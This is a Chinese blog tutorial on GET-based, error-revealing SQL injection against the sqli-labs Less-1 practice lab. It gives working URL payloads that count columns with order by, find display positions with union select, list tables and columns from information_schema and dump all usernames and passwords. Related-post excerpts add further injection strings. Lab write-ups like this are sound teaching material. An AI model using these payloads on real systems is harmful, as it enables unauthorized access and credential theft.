SQL注入实战——get基于报错的注入

已于 2024-09-25 17:21:49 修改
阅读量843 收藏 3
点赞数 23
CC 4.0 BY-SA版权
文章标签: sql 数据库
于 2024-09-25 17:07:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78817088/article/details/142524548

1.用上次搭建的sqli-labs靶场中less-1(基于报错的单引号字符串)进行实操

进入后我们看到这样的回显:请输入ID作为带数值的参数

正常输入?id=1 发现,发现没有问题

加上单引号后有报错

 2.用order by语句

注:order by语句是按照字段排序

这里我们从1开始试,发现3可以,证明数据库是有编号为3的字段

 

当我们把3改成4,会发现报错:Unknown column '4' in 'order clause'

证明当前数据库表只有三个字段

3.利用union的联合查询来实现

ID=0后回显报错,接下来我们用union的联合报错

因为有前面判断出有三个字段,用1,2,3 。后面用--+注释掉

查询结果如上所示

union联合查询能帮助我们找出第几个字段的内容放在login name和password的位置;

因为ID=0,所有真正的用户名和密码无法查询,用union联合查询查到在第2和3字段 

4.利用MySQL函数查询

查询登录名user(),数据库名database()

爆出当前用户为root@localhost,该页面访问的数据库为security

5.获得表名

id=0%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+

group_concat(table_name):占用2的位置爆出所有表名

information_schema.tables:从information_schema库里面的tables表的爆出

where table_schema=database():条件

所有该数据库所有的表名是:emails,referers,uagents,users

分析:users跟用户有关

6.爆出users表里的所有字段

id=0%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

原数据的column_name字段是从information_schem库中存放的columns表里得到的

此时爆出了表上所有字段包括 id,username,password

7.根据字段名爆出字段具体信息

还是用union联合注入

id=0%27%20union%20select%201,group_concat(username,0x3a,password),3%20from%20users%20--+

group_concat(username,0x3a,password):获得username和password字段

0x3a:为了区分

获得所有的用户名和密码!

到这里我们就完成了(基于get)利用SQL注入把一个数据库爆掉,获取所有用户名和密码,我们主要用到的是联合注入,同时利用order by 以此爆出数据库名,表名,字段名,找到有用的字段信息。

希望对你有所帮助!!!

记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5642
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入的防御方法很多,也是老生常谈的问题。
SQL注入——渗透day06
qq_62716256的博客
08-12 1119
SQL注入——渗透day06
sqli-labs,sql注入靶场less1、less2 全网最详细,每条命令都有详解,最完整解析
2401_89478347的博客
12-04 1470
5、拿到数据库名字后利用mysql自带的系统数据库information_schema来查看当前所有数据库的名字,information_schema这个数据库里面包含了所有数据库的名字,schema_name是系统数据库information_schema中的一个字段,即列,该列包含了当前mysql下所有数据库的名字,group_concat()函数是为了将所有数据库的名字合并成一个字符串返回,该函数会将各个数据库的名字用逗号隔开来返回。
get基于报错sql注入
冷巷(✘_✘)的博客
07-14 1184
目录1.SQL注入的分类数字型字符型2.get基于报错sql注入发现3.get基于报错sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类型可将sql注入分为数字型和字符型。例如 字符型 例如 2.get基于报错sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
SQL注入sqli-labs学习(less-1)
2302_80814694的博客
08-07 607
解压后打开目录点击第二个更新这个方可打开(如果更新失败\php\phpstudy_pro\WWW\sqli-labs-master\sql-connections修改这里面的db-creds.inc文件将默认数据库密码改正一至)我们用union进行查询(首先我们想要显示union后的语句我们要先把前边的语句返回为空所以应该为?我们看到其users表我们怀疑它里面包含用户的数据,所以我们可以先对数据表users进行查询。如果我们想把两个显示位都用起来我们可以上边显示所有数据库下边显示指定数据库所有的表。
SQL注入--get注入
weixin_52151447的博客
11-11 2567
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
GET基于报错SQL注入
LuckySec
02-11 723
当前用户:select user(); 所有数据库:show databases; 当前数据库:select database(); 当前版本:select version(); mysql常用注释符:#或–空格或/**/ 空格也就是%20 内联注释:/!SQL语句/只有MySQL可以识别,常用来绕过WAF select * from articles where id=id...
SQL 手动注入学习实战 —— dvwa 从low到impossible《low篇》
qq_40476955的博客
01-10 5021
在PHP中动态构造SQL语句的语言是query="SELECT∗FROMusersWHEREusername=".query=" SELECT * FROM users WHERE username = "._GET[“name”]; 通过控制name参数,修改执行的SQL语句,可以达到攻击的目的。
Sql注入实验(一)——字符型注入GET
DaydreamF的博客
04-13 1664
Sqli-libs Less1——字符型注入 URL:http://192.168.224.128/sqli/Less-1/ 一、手工注入 1…打开页面,如下所示: 2.根据提示,在url后输入参数id的值,页面显示: 说明,根据传入id参数值的不同,后台服务器查询的数据不同,展示在了前端界面。(参数可控) 3.尝试在参数值的后面输入特殊字符,看页面是否报出数据库语法错误报错语句: You have an error in your SQL syntax; check the manual t
网络攻防技术——SQL注入
学习记录
02-27 3349
一、题目 SQL注入是一种代码注入技术,它利用web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在web应用程序中正确检查时,就会出现此漏洞。许多web应用程序从用户处获取输入,然后使用这些输入构造SQL查询,这样web应用程序就可以从数据库中获取信息。Web应用程序还使用SQL查询在数据库中存储信息。这些是web应用程序开发中的常见做法。如果未仔细构造SQL查询,则可能会出现SQL注入漏洞。SQL注入攻击是对web应用程序最常见的攻击之一。 在本实验室中,我们创建了一
SQL注入--GET注入
liukenn的博客
07-29 5826
一个带get型参数并且存在从数据库中返回数据的网站: http://127.0.0.1/index.php?id=1   可以进行如下尝试检测是否存在注入点: http://127.0.0.1/index.php?id=1 and 1=1 http://127.0.0.1/index.php?id=1 and 1=2 http://127.0.0.1/index.p
sql注入(get)
wysw1998的博客
08-04 2510
SQL注入漏洞介绍: SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所有的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL注入的产生原因通常表现在以下几方面:1.不当的处理;2.不安全的数据库配置;3.不合理的查询集处理;4.不当的错误处理;5.转义字符处理不合适;6.多个...
sql注入GET/POST注入
热门推荐
qq_38135094的博客
04-02 1万+
针对不同数据库,语句有所不同,但是思路大致相同 第一步判断网站是否存在注入, 如 www.xxx.com/news.php?id=10 这个网址,使用and 1=1,and 1=2 判断是否存在注入 还需要判断数据库类型,在网址后面加上单引号,看报错情况,如果显示Microsoft JET Database错误,则是Access数据库,如果显示ODBC类型,则是MSSQL数据库
常用的SQL注入语句
孤的博客
10-11 2394
SQL是一种组织、管理和检索计算机数据库村粗数据的工具,它是一种计算机语言。 每天SQL语句均由一个谓词开始,该谓词描述这条语句要产生的动作,列如SELECT或UPDATE关键字。谓词后紧接一条或多天子句,子句中给出了被谓词作用的数据或提供谓词动作的详细信息。每条子句由一个关键字开始,SELECT谓词后为FROM关键字。 局部变量(Local Variable)和全局变量(Global Varia...
SQL注入GET型常规注入
Jim的博客
08-14 4552
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
PostgreSQL诊断系列(4/6):表空间与膨胀分析——解决“越用越大”的存储难题
SmartDB开源项目作者:https://github.com/wenb1n-dev/SmartDB_MCP
08-26 278
PostgreSQL诊断系列(4/6):表空间与膨胀分析——解决“越用越大”的存储难题
编程与数学 03-004 数据库系统概论 04_关系数据库标准语言SQL
最新发布
明月看潮生的博客
08-28 1018
本文全面介绍了SQL语言及其在关系数据库中的应用。SQL是一种声明性、简洁且功能强大的标准化语言,用于定义、操纵和控制数据。文中详细阐述了SQL的三大功能:数据定义语言(DDL)用于创建、修改和删除数据库及表;数据操纵语言(DML)支持数据的插入、查询、更新和删除;数据控制语言(DCL)负责授权、收回权限和事务控制。通过具体语句示例,展示了如何使用SQL进行数据库操作,强调了其在确保数据一致性和完整性方面的重要性。读者可通过本文深入理解SQL语言的理论与实践应用。
SQL优化案例】SQL执行频率问题与优化效果预期
weixin_60783132的博客
08-27 1019
本文分享了两个SQL优化案例以及优化效果预期: 案例一指出JUDGE_TASK表因业务逻辑设计不合理导致3个高频SQL每天产生110TB逻辑读,建议降低执行频率或建立索引; 案例二发现ZONE_LIST表因缺少索引导致高频查询产生13.18TB/天逻辑读,通过建立唯一索引使逻辑读降低98.5%。 通过关注常见指标逻辑读、执行时间、CPU使用率、主机负载、AAS、DB TIME、DB CPU等判断优化效果。
SQL注入攻击详解:基于报错GET注入技术
"本资源主要介绍了SQL注入攻击中的基于报错的一种类型,特别是针对GET请求的报错注入方法。内容涵盖了SQL注入的基本分类、GET方式下的报错注入检测与利用,以及如何使用Sqlmap工具进行漏洞测试。" 在网络安全领域,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值